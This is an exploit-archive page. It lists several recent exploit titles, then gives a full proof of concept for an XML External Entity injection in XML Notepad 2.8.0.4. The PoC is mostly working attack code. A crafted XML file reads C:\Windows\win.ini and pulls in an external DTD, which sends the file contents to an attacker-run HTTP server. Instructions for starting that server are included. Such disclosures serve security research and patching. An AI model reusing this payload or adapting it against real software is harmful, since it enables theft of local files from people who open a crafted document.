
8 changes to exploits/shellcodes iOS IOUSBDeviceFamily 12.4.1 - 'IOInterruptEventSource' Heap Corruption (PoC) iMessage - Decoding NSSharedKeyDictionary can read ObjC Object at Attacker Controlled Address Adobe Acrobat Reader DC for Windows - Use of Uninitialized Pointer due to Malformed JBIG2Globals Stream Adobe Acrobat Reader DC for Windows - Use of Uninitialized Pointer due to Malformed OTF Font (CFF Table) _GCafé 3.0 - 'gbClienService' Unquoted Service Path Alps HID Monitor Service 8.1.0.10 - 'ApHidMonitorService' Unquote Service Path XML Notepad 2.8.0.4 - XML External Entity Injection
29 lines
No EOL
826 B
Text
29 lines
No EOL
826 B
Text
# Exploit Title: XML Notepad 2.8.0.4 - XML External Entity Injection
|
|
# Date: 2019-11-11
|
|
# Exploit Author: 8-Team / daejinoh
|
|
# Vendor Homepage: https://www.microsoft.com/
|
|
# Software Link: https://github.com/microsoft/XmlNotepad
|
|
# Version: XML Notepad 2.8.0.4
|
|
# Tested on: Windows 10 Pro
|
|
# CVE : N/A
|
|
|
|
# Step
|
|
1) File -> Open -> *.xml
|
|
|
|
# Exploit Code
|
|
|
|
1) Server(python 3.7) : python -m http.server
|
|
2) Poc.xml :
|
|
<?xml version="1.0"?>
|
|
<!DOCTYPE test [
|
|
<!ENTITY % file SYSTEM "C:\Windows\win.ini">
|
|
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/payload.dtd">
|
|
%dtd;]>
|
|
<pwn>&send;</pwn>
|
|
|
|
3) payload.dtd
|
|
<?xml version="1.0" encoding="UTF-8"?>
|
|
<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>">
|
|
%all;
|
|
|
|
-------------------------------------------------------------------------------- |